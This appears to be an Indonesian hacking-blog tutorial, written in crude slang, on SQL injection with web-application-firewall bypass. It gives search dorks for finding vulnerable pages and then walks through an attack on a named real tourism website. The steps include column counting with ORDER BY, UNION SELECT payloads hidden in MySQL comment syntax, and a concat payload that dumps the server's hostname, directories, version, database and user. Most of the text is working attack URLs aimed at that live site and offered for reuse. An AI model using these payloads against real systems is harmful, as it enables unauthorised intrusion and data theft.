TUTORIAL SQLI PRINT ! BYPASS WAF !!




                                                                    Post By : Rvms 
                                                        Thanks to : ROBH | OFFCIAL 



                                                           Assalamualaikum Wr.Wb



OK MAAF LAMA GAK UPLOAD YA COK SORRY YA KNTL LAGI SIBUK, COK YOU KNOW LAH GW GANS JADI AGAK SIBUK DIKIT YA COK

OK COK LANGSUNG KE TUTORNYA


Bahan
- Ketampanan muklak ( KEK GW )
- Dork
- Rokok And Kopi
- Ceue juga butuh

Dork bisa pakai ini ya cok

product.php?id=
views.php?id=
index.php?id= site:.com ( ubah sesuai selera )
.php?id= Malaysia ( Sebagai contoh ea itu jg bisa di ubah jadi kota ataupun lain" )
Selengkapnya use you otak yg goblok itu

( Serius Mode On )
Pertama

Kalian Dorking dulu

Yah gw mau dorking pake

- .php?id= surabaya ( Kota w cuk :v )




Next Pilih Target ya cuk

Live Target

http://www.surabayatourism.com/det_agenda.php?ID=11&lang=0



Bagi lu yang bingung dimana injectnya kalian inject tepat sebelahnya ( id= )

Contoh : http://www.surabayatourism.com/det_agenda.php?ID=11'&lang=0

Nanti Bakal ada perubahan pada web nya



You See that ? ( Nginggris Dkit :v )

Itu Artinya apa ? Artinya Lu goblok , ya vuln la ajg


Next Lakukan Order By

Untuk ngecek kalian bisa lakukan order by 99--+

http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+99--+&lang=0

And Liat Tampilan Webnya error gak ?
Kalo error Kalian Lanjut Ngentod nya

http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+1--+&lang=0

Tampilan web Kembali normal ?

untuk mencari jumlah column nya naik kan angka nya

http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+2--+&lang=0 ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+3--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+4--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+5--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+6--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+7--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+8--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+9--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+10--+&lang=0  ==> Not error
http://www.surabayatourism.com/det_agenda.php?ID=11+order+by+11--+&lang=0 ==> ERROR !

Berarti Jumlah colum nya 10 , kenapa 10 ? Soalnya pada saat order by 11 web nya error jadi jumlah column di web ini ada 10 colum

Next Jika sudah menemukan jumlah column nya lakukan union select sesuai jumlah column tadi

CATATAN : JANGAN LUPA SEBELUM UNION SELECT KASIH TANDA ( - ) Di SEBELAH NOMER NYA

contoh :

http://www.surabayatourism.com/det_agenda.php?ID=-11+union+select+1,2,3,4,5,6,7,8,9,10,11--+&lang=0



And You see That ? 403 ? Fordiben
Solusi ?
Kita coba mem bypass union select na

ByPass Waf Union na macem"

/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
/*!50000UNION*/+/*!SELECT*/

Nah Disini w mau make bypass /*!50000UNION*/+/*!SELECT*/
Contoh : 

http://www.surabayatourism.com/det_agenda.php?ID=-11+/*!50000UNION*/+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10--+&lang=0



And You See that ? Ada beberapa angka yang keluar itu angka togel nya

Next Langsung Print ^_^

Pergi kesini dlu

http://www.waraxe.us/sql-char-encoder.html

Nah ketik nama lu di column atas sendiri




Copy code yang di atas kiri itu
Jadinya gini : 0x496e6a656374696f6e2042792052766d73

Langsung paste code itu ke Nomer togel tadi , karena disini yang muncul no 4 6 dan 9 Saya taruh di no 4 , Hapus no 4 dan ganti dengan code tadi

Contoh :

http://www.surabayatourism.com/det_agenda.php?ID=-11+/*!50000UNION*/+/*!SELECT*/+1,2,3,0x496e6a656374696f6e2042792052766d73,5,6,7,8,9,10--+&lang=0



Nak You see that ? ada nama orang Gans Disitu Masih sisah 2 Nomer nih yaitu angka 6 dan 9 kalian bisa print Misal : user,version,dll lah gunain concat(hex kode) apa itu hek kode ? kode yg udh di hex di web atas tdi asu




Jadinya kek gitu ya asu btw sorry itu database ama user gk ke print soalnya 403 , and males nge bypass capek asu bikin tutor lama curhat dikit yah


http://www.surabayatourism.com/det_agenda.php?ID=-11+/*!50000UNION*/+/*!SELECT*/+1,2,3,concat(0x3c62723e,0x496e6a656374696f6e2042792052766d73),5,concat(0x3c62723e,0x486f73744e616d65203a3a,@@hostname,0x3c62723e,0x546570744469726563746f7279203a3a,@@tmpdir,0x3c62723e,0x44617461446972203a3a,@@datadir,0x3c62723e,0x56657273696f6e203a3a,version(),0x3c62723e,0x4461746162617365203a3a,0x3c62723e,0x55736572203a3a,0x3c62723e,0x53594d203a3a,@@GLOBAL.have_symlink),7,8,9,10--+&lang=0


Kurang lebihnya kaya gitu
concat(0x3c62723e,0x486f73744e616d65203a3a,@@hostname,0x3c62723e,0x546570744469726563746f7279203a3a,@@tmpdir,0x3c62723e,0x44617461446972203a3a,@@datadir,0x3c62723e,0x56657273696f6e203a3a,version(),0x3c62723e,0x4461746162617365203a3a,database(),0x3c62723e,0x55736572203a3a,user(),0x3c62723e,0x53594d203a3a,@@GLOBAL.have_symlink)


Bagi kalian yang males nge hex tuh w kasih dios nya tinggal paste di nomer togel tadi
Btw kalo ada kekurangan atau apa bisa coment ya kntl , Bagi yang belum paham bisa hubungi gw langsung 0895620119462 Kasih w saran cuk buat kontent soalnya w bingung mau ngajar apa kan ea , yah w sih cuma mau kalian semua bisa cuk ok sekian dulu dari gw kalo ada salah kata mohon maaf

Assalamualaikum Wr.Wb

11 Komentar untuk "TUTORIAL SQLI PRINT ! BYPASS WAF !!"

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel